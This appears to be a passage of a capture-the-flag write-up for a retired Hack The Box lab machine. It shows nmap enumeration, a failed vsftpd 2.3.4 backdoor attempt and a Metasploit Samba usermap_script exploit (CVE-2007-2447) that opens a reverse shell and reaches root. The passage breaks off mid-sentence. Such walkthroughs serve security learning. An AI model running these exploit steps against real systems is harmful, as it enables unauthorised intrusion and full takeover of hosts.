I will be covering write-ups of all retired machines, so stay tuned for future posts!
As always, let's start by enumerating running services on the target:
nmap -T4 -A -v 10.10.10.3 Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-17 15:29 EDT NSE: Loaded 146 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 15:29 Completed NSE at 15:29, 0.00s elapsed Initiating NSE at 15:29 Completed NSE at 15:29, 0.00s elapsed Initiating Ping Scan at 15:29 Scanning 10.10.10.3 [4 ports] Completed Ping Scan at 15:29, 0.23s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 15:29 Completed Parallel DNS resolution of 1 host. at 15:29, 0.02s elapsed Initiating SYN Stealth Scan at 15:29 Scanning 10.10.10.3 [1000 ports] Discovered open port 22/tcp on 10.10.10.3 Discovered open port 21/tcp on 10.10.10.3 Discovered open port 139/tcp on 10.10.10.3 Discovered open port 445/tcp on 10.10.10.3 Completed SYN Stealth Scan at 15:29, 11.30s elapsed (1000 total ports) Initiating Service scan at 15:29 Scanning 4 services on 10.10.10.3 Completed Service scan at 15:29, 11.36s elapsed (4 services on 1 host) Initiating OS detection (try #1) against 10.10.10.3 Retrying OS detection (try #2) against 10.10.10.3 Initiating Traceroute at 15:29 Completed Traceroute at 15:29, 0.13s elapsed Initiating Parallel DNS resolution of 2 hosts. at 15:29 Completed Parallel DNS resolution of 2 hosts. at 15:29, 0.02s elapsed NSE: Script scanning 10.10.10.3. Initiating NSE at 15:29 NSE: [ftp-bounce] PORT response: 500 Illegal PORT command. Completed NSE at 15:30, 40.10s elapsed Initiating NSE at 15:30 Completed NSE at 15:30, 0.00s elapsed Nmap scan report for 10.10.10.3 Host is up (0.12s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.14.3 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) | ssh-hostkey: | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA) |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Arris TG862G/CT cable modem (91%), Dell Integrated Remote Access Controller (iDRAC6) (91%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (91%), Linux 2.4.21 - 2.4.31 (likely embedded) (91%), Linux 2.4.27 (91%), Citrix XenServer 5.5 (Linux 2.6.18) (91%), Linux 2.6.22 (91%), Linux 2.6.8 - 2.6.30 (91%), Dell iDRAC 6 remote access controller (Linux 2.6) (91%) No exact OS matches for host (test conditions non-ideal). Uptime guess: 2.311 days (since Fri Sep 15 08:02:47 2017) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=206 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb-os-discovery: | OS: Unix (Samba 3.0.20-Debian) | NetBIOS computer name: | Workgroup: WORKGROUP\x00 |_ System time: 2017-09-17T14:57:26-04:00 |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 123.67 ms 10.10.14.1 2 123.15 ms 10.10.10.3
So there is vsFTPd 2.3.4, which allows anonymous login in this instance. SSH is open, and so is Samba (version 3.0.20).
Metasploit has some neat modules for enumerating a few things related to Samba. Lets check out the named pipes, in case there is anything of interest.
msf > use auxiliary/scanner/smb/pipe_auditor msf auxiliary(pipe_auditor) > show options Module options (auxiliary/scanner/smb/pipe_auditor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 1 yes The number of concurrent threads msf auxiliary(pipe_auditor) > set rhosts 10.10.10.3 rhosts => 10.10.10.3 msf auxiliary(pipe_auditor) > run [*] 10.10.10.3:139 - Pipes: \netlogon, \lsarpc, \samr, \eventlog, \lsass, \ntsvcs, \srvsvc, \wkssvc [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Right off the bat, a quick search for vsFTPd 2.3.4 shows that it had a built-in backdoor briefly for this version, and wouldn't you know, there is a Metasploit module for it.
msf auxiliary(smb_version) > use exploit/unix/ftp/vsftpd_234_backdoor msf exploit(vsftpd_234_backdoor) > show options Module options (exploit/unix/ftp/vsftpd_234_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 21 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic msf exploit(vsftpd_234_backdoor) > set rhost 10.10.10.3 rhost => 10.10.10.3 msf exploit(vsftpd_234_backdoor) > run [*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4) [*] 10.10.10.3:21 - USER: 331 Please specify the password. [*] Exploit completed, but no session was created.
Darn, no luck. This copy must not contain the backdoor. A quick login and check as the anonymous FTP user gets us nowhere. We are jailed to an empty directory.
Another quick search for Samba 3.0.20 reveals CVE-2007-2447, which is an RCE vulnerability that requires no authentication. Metasploit also conveniently has a built-in module for this, so let's give it a shot.
msf exploit(vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script msf exploit(usermap_script) > show options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 139 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic msf exploit(usermap_script) > set rhost 10.10.10.3 rhost => 10.10.10.3 msf exploit(usermap_script) > run [*] Started reverse TCP double handler on 10.10.14.3:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 0MefBteS03VkpAjA; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "0MefBteS03VkpAjA\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:55479) at 2017-09-17 15:52:35 -0400 pwd / whoami root
Bingo! We are in as the root user. From here we just grab our flags from